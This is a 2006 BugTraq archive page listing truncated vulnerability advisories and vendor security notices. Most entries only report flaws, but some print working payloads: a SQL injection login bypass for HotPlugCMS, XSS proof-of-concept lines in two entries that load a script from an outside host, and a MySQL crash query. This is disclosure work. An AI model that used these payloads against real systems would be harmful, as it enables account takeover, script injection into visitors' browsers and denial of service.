BugTraq
HotPlugCMS_1.0 - SQL Injection Vulnerability 2006-06-15
guest01 gmail com
HotPlugCMS doesn't check input field values, so logging in on /hotplugcms/administration/tblcontent is very easy with

' OR 1=1 /*

and a SQL-inject will bypass the entire authentication process.

Typical, very simple SQL Injection.

peda

Advisory: Unauthorized password recovery in phpBannerExchange 2006-06-15
RedTeam Pentesting (release redteam-pentesting de)
Advisory: Unauthorized password recovery in phpBannerExchange

RedTeam identified an SQL injection that can be triggered due to a bad
user input sanitization in phpBannerExchange. It is possible to recover
a password of a user and thereby overtake his account.

Details
=======

Product: phpBannerE

Advisory: Authentication bypass in phpBannerExchange 2006-06-15
RedTeam Pentesting (release redteam-pentesting de)
Advisory: Authentication bypass in phpBannerExchange

RedTeam identified two SQL injections in phpBannerExchange. It is
possible to bypass user authentication with them.

Details
=======

Product: phpBannerExchange
Affected Versions: All versions up to phpBannerExchange 2.0 RC5
Fixed Versions: 2.0

MP3 Search/Archive v1.2 - XSS 2006-06-15
luny youfucktard com
MP3 Search/Archive v1.2

Homepage:

http://www.bloodys.com

Affected files:

Search input box.

index.php

Data is not properly sanitized before it's generated. For PoC try putting the code below in the search box:

<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

Screenshots:

http

[SECURITY] [DSA 1100-1] New wv2 packages fix integer overflow 2006-06-15
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1100-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
June 15th, 2006

[ MDKSA-2006:104 ] - Updated sendmail packages fix remotely exploitable vulnerability 2006-06-15
security mandriva com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:104
http://www.mandriva.com/security/
____________________________________________________________________

APBoard 2.2-r3 <= SQL Injections 2006-06-14
666 hell de tk
################################################################

## APBoard 2.2-r3 <= SQL Injections ##

## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -##

## ##

## Discovered by: 666 (SR-Crew)

ePrayver v.Alpha - XSS 2006-06-14
luny youfucktard com
Eprayer v.Alpha.

Homepage:

http://eprayer.sourceforge.net

Affected files:

Input boxes of prayer request.

User submitted data is not sanitized before being dynamically generated. Try putting the code below in as "Your name"

<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

Screens

Re: Amr Talkbox talkbox.PHP - Remote File Include Vulnerabilities 2006-06-15
Steven M. Christey (coley mitre org)

SpC-x said:

> # Amr Talkbox talkbox.PHP - Remote File Include Vulnerabilities
>
> ...
> # if ($lang == "eng") {
> # include ("$direct/lang_eng.txt");
> # } elseif ($lang =="ita") {
> # include ("$direct/lang_ita.txt");

However, looking at the source code as available on
http://scripts.ringsworl

[USN-300-1] wv2 vulnerability 2006-06-14
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-300-1 June 14, 2006
wv2 vulnerability
CVE-2006-2197
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubunt

Secunia Research: DeluxeBB SQL Injection and File Inclusion Vulnerabilities 2006-06-14
Secunia Research (vuln-remove secunia com)
======================================================================

Secunia Research 14/06/2006

- DeluxeBB SQL Injection and File Inclusion Vulnerabilities -

======================================================================
Table of Contents

Affected Software....

FreeBSD Security Advisory FreeBSD-SA-06:17.sendmail 2006-06-14
FreeBSD Security Advisories (security-advisories freebsd org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
FreeBSD-SA-06:17.sendmail Security Advisory
The FreeBSD Project

Topic: In

EC2ND - Call for Papers 2006-06-14
Blyth A J C (Comp) (ajcblyth glam ac uk)
2nd European Conference on Computer Network Defense (EC2ND)

14th/15th December 2006, School of Computing, University of Glamorgan,
UK.

Call for Papers

The 2nd European Conference on Computer Network Defense will take place
in December 2006 at the School of Computin

Secunia Research: CMS Mundo SQL Injection and File Upload Vulnerabilities 2006-06-14
Secunia Research (vuln-remove secunia com)
======================================================================

Secunia Research 14/06/2006

- CMS Mundo SQL Injection and File Upload Vulnerabilities -

======================================================================
Table of Contents

Affected Software.....

[USN-301-1] kdm vulnerability 2006-06-14
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-301-1 June 14, 2006
kdebase vulnerability
CVE-2006-2449
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
U

[ MDKSA-2006:103 ] - Updated spamassassin packages fix vulnerability 2006-06-14
security mandriva com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:103
http://www.mandriva.com/security/
____________________________________________________________________

[SECURITY] [DSA 1099-1] New horde2 packages fix cross-site scripting 2006-06-14
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1099-1 security (at) debian (dot) org
http://www.debian.org/security/ Moritz Muehlenhoff
June 14th, 2006

[ MDKSA-2006:102 ] - Updated libtiff packages fixes tiff2pdf vulnerability 2006-06-14
security mandriva com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:102
http://www.mandriva.com/security/
____________________________________________________________________

[SECURITY] [DSA 1098-1] New horde3 packages fix cross-site scripting 2006-06-14
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1098-1 security (at) debian (dot) org
http://www.debian.org/security/ Moritz Muehlenhoff
June 14th, 2006

[ MDKSA-2006:101 ] - Updated squirrelmail packages fix vulnerabilities 2006-06-14
security mandriva com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:101
http://www.mandriva.com/security/
____________________________________________________________________

MySQL DoS 2006-06-14
Kanatoko (anvil jumperz net) (1 replies)

Description:
A query like "select str_to_date( 1, NULL );" crashes mysqld.

Unaffected versions:
*>= 4.1.18
*>= 5.0.19
*>= 5.1.6

For more details:
http://bugs.mysql.com/bug.php?id=15828

--
Kanatoko <anvil (at) jumperz (dot) net>
Open Source WebAppFirewall
http://guardian.jumperz.net/

Re: MySQL DoS 2006-06-15
Tonnerre Lombard (tonnerre lombard sygroup ch)
[KDE Security Advisory] KDM symlink attack vulnerability 2006-06-14
Dirk Mueller (mueller kde org)

KDE Security Advisory: KDM symlink attack vulnerability
Original Release Date: 2006-06-14
URL: http://www.kde.org/info/security/advisory-20060614-1.txt

0. References

CVE-2006-2449

1. Systems affected:

KDM as shipped with KDE 3.2.0 up to including 3.5.3. KDE 3.1.x and
older and newer

PhpBlueDragon CMS 2.9.1, File inclusion vulnerability 2006-06-14
Federico Fazzi (federico autistici org)
-----------------------------------------------------
Advisory id: FSA:015

Author: Federico Fazzi
Date: 14/06/2006, 18:20
Synthesis: PhpBlueDragon CMS 2.9.1, File inclusion vulnerability
Type: high
Product: http://phpbluedragon.net/
Patch: unavailable
---------------------------------

Fusion Polls (xtrphome) Remote File Inclusion 2006-06-14
SpC-x Bsdmail Org
######################################################

# Fusion Polls (xtrphome) Remote File Inclusion

######################################################

# Credit : SpC-x

# Mail : SpC-x (at) bsdmail (dot) Org

# Site : http://wWw.SaVSaK.CoM

######################################################

# Gre

[SECURITY] [DSA 1097-1] New Kernel 2.4.27 packages fix several vulnerabilities 2006-06-14
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1097-1 security (at) debian (dot) org
http://www.debian.org/security/ Dann Frazier, Troy Heber
June 14th, 2006

Flipper Poll (root_path) Remote File Inclusion 2006-06-14
SpC-x Bsdmail Org
######################################################

# Flipper Poll (root_path) Remote File Inclusion

######################################################

# Credit : SpC-x

# Mail : SpC-x (at) bsdmail (dot) Org

# Site : http://wWw.SaVSaK.CoM

######################################################

# Gr

[ GLSA 200606-15 ] Asterisk: IAX2 video frame buffer overflow 2006-06-14
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

SEC Consult SA-20060613-0 :: Outlook Web Access Cross Site Scripting Vulnerability 2006-06-14
SEC Consult Research (research sec-consult com)
SEC-CONSULT Security Advisory < 20060613-0 >
=======================================================================
title: HTML Code Injection in Outlook Web Access
program: Outlook Web Access
vulnerable version: Exchange 2000 (SP3), 2003 (SP1), 2003 (SP2)

[ GLSA 200606-16 ] DokuWiki: PHP code injection 2006-06-14
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

Copyright 2010, SecurityFocus